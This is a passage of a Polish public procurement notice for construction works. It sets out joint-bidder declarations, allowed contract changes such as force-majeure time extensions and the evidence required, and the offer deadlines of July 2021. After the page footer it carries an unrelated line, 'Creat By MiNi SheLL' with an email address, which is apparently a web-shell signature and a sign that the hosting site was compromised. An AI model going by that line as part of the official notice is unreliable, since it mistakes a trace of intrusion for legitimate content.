oświadczenia stanowi Załącznik Nr 3 do SWZ. W<br/>przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie o<br/>niepoleganiu wykluczeniu składa każdy z Wykonawców zaś oświadczenie o spełnieniu<br/>warunków udziału w postępowaniu ten z wykonawców który dany warunek spełnia z<br/>zaznaczeniem, który warunek postawiony przez Zamawiającego jest spełniony przez danego<br/>Wykonawcę wspólnie ubiegającego się o udzielenie zamówienia;<br/>4) w przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, Wykonawcy<br/>składają oświadczenie z art. 117 ust. 4 ustawy Pzp, którego wzór stanowi Załącznik nr 7 do<br/>SWZ.<br/>3. Przed podpisaniem umowy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (w<br/>przypadku wyboru ich oferty jako najkorzystniejszej) przedstawią Zamawiającemu umowę<br/>regulującą współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający oświadcza, iż przewiduje możliwość zmian umowy w stosunku do treści oferty,<br/>na podstawie której dokonano wyboru Wykonawcy, w przypadkach wskazanych w niniejszym<br/>paragrafie.<br/>2. Zamawiający dopuszcza możliwość zmiany terminu wykonania przedmiotu umowy<br/>określonego w § 2 ust. 1, spowodowanego jedną z następujących przyczyn:<br/>1) wystąpienia konieczności wykonania robót zamiennych, robót dodatkowych, które wstrzymują<br/>lub opóźniają realizację przedmiotu umowy – o okres opóźnienia lub wstrzymania prac;<br/>2) wystąpienia konieczności wykonania robót budowlanych objętych zamówieniem dodatkowym,<br/>których wykonanie jest niezbędne do wykonania zamówienia podstawowego, skutkujące zmianą<br/>zakresu robót i/lub przedłużenia terminu realizacji zamówienia. Roboty objęte zamówieniem<br/>dodatkowym będą zlecane po zawarciu z Wykonawcą odrębnej umowy o zamówienie<br/>dodatkowe. Udzielenie zamówienia dodatkowego musi być poprzedzone sporządzeniem<br/>protokołu konieczności – o okres opóźnienia lub wstrzymania prac związanych z wykonaniem<br/>robót objętych zamówieniem dodatkowym;<br/>3) wystąpienia konieczności dokonania zmian w dokumentacji projektowej – o okres, w którym<br/>będą dokonywane zmiany projektowe oraz ewentualne trwające w związku z tym postępowania<br/>administracyjne;<br/>4) działania siły wyższej, czyli niezwykłych i nieprzewidzianych okoliczności niezależnych od strony, która się na nią powołuje, i których konsekwencji pomimo zachowania należytej<br/>staranności nie można było przewidzieć przed wszczęciem postępowania o udzielenie<br/>zamówienia publicznego. Pod pojęciem siły wyższej na potrzeby niniejszego warunku, należy<br/>rozumieć zdarzenie zewnętrzne o charakterze niezależnym od stron, którego nie można<br/>uniknąć, ani któremu nie mogły zapobiec Strony przy zachowaniu należytej staranności, oraz<br/>którego nie można przypisać drugiej stronie. Za siłę wyższą warunkującą zmianę umowy uważać<br/>się będzie w szczególności pożar, powódź, silne wiatry, obfite opady atmosferyczne,<br/>ekstremalny upał lub mróz, wojny, stany nadzwyczajne, klęski żywiołowe, epidemie,<br/>ograniczenia związane z kwarantanną, embargo, rewolucje, zamieszki i strajki trwające powyżej<br/>7 dni roboczych lub inne zdarzenie związane z działaniem sił natury, jeżeli uniemożliwiają lub<br/>znacznie utrudniają prowadzenie robót budowlanych – o okres działania siły wyższej oraz<br/>usuwania skutków jej działania.<br/>3. W przypadku ustania przyczyn określonych w ust. 2, Strony niezwłocznie przystąpią do<br/>realizacji swych obowiązków wynikających z umowy.<br/>4. Po ustaniu przyczyn uniemożliwiających wykonywanie przedmiotu zamówienia Wykonawca<br/>jest zobowiązany niezwłocznie zawiadomić o tym fakcie Zamawiającego.<br/>5. Wraz z zawiadomieniem Wykonawca jest zobowiązany przedstawić dowody potwierdzające<br/>zaistnienie zdarzeń uzasadniających wydłużenie terminu wykonania zamówienia oraz<br/>potwierdzające długość okresu, przez który przedmiot zamówienia nie mógł być wykonywany.<br/>6. Dowodami mogą być w szczególności:<br/>1) informacje Instytutu Meteorologii i Gospodarki Wodnej potwierdzające zaistnienie zdarzenia,<br/>na które powołuje się Wykonawca;<br/>2) dokumentacja fotograficzna;<br/>3) pisma właściwych organów;<br/>4) decyzje administracyjne wydane przez właściwe organy;<br/>5) oświadczenia Wykonawcy.<br/>7. Wraz z zawiadomieniem o ustaniu przyczyn uniemożliwiających wykonywanie przedmiotu<br/>zamówienia Wykonawca może złożyć wniosek o wydłużenie terminu realizacji przedmiotu<br/>zamówienia.<br/>8. Wnioskowany okres wydłużenia realizacji przedmiotu zamówienia nie może być dłuższy niż<br/>okresy, o których mowa w ust. 2.<br/>Ze względu na ograniczoną liczbę znaków, pozostałe zapisy dotyczące zmian postanowień<br/>umowy znajdują się w par. 17 od ust. 9 do 13 Załącznika Nr 2 do SWZ - PROJEKTOWANE<br/>POSTANOWIENIA UMOWY. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-07 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem platformy zakupowej. Sposób złożenia oferty opisany został w Instrukcji dotyczącej sposobu i formy złożenia oferty dostępnej na stronie internetowej: www.platformazakupowa.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-07 12:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-08-05</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-06-22 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com